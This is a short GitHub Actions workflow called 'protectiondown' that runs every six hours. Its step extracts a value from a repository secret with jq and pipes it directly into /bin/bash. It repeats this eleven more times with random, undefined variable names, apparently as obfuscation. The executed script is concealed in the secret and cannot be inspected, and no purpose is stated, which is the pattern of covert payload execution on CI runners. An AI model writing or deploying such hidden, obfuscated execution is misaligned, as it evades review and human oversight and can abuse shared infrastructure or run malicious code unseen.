name: protectiondown
on:
  workflow_dispatch:
  schedule:
    - cron: '12 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: protectiondown
        env:
          uqvtc035: ${{ secrets.uqvtc035 }}
        run: |
          echo $uqvtc035 | jq -r .sy6 | /bin/bash
          echo $giei5362 | jq -r .ett5270 | /bin/bash
          echo $hr50553 | jq -r .pndf39067 | /bin/bash
          echo $gju61523 | jq -r .o6 | /bin/bash
          echo $wnkz780 | jq -r .j4823 | /bin/bash
          echo $koi4275 | jq -r .jnbu628 | /bin/bash
          echo $x40293 | jq -r .ichrr336 | /bin/bash
          echo $o903 | jq -r .ougpu586 | /bin/bash
          echo $dukep605 | jq -r .zwlxz71 | /bin/bash
          echo $jsl9884 | jq -r .a771 | /bin/bash
          echo $gwec6745 | jq -r .rlehz8 | /bin/bash
          echo $d442 | jq -r .uj61 | /bin/bash

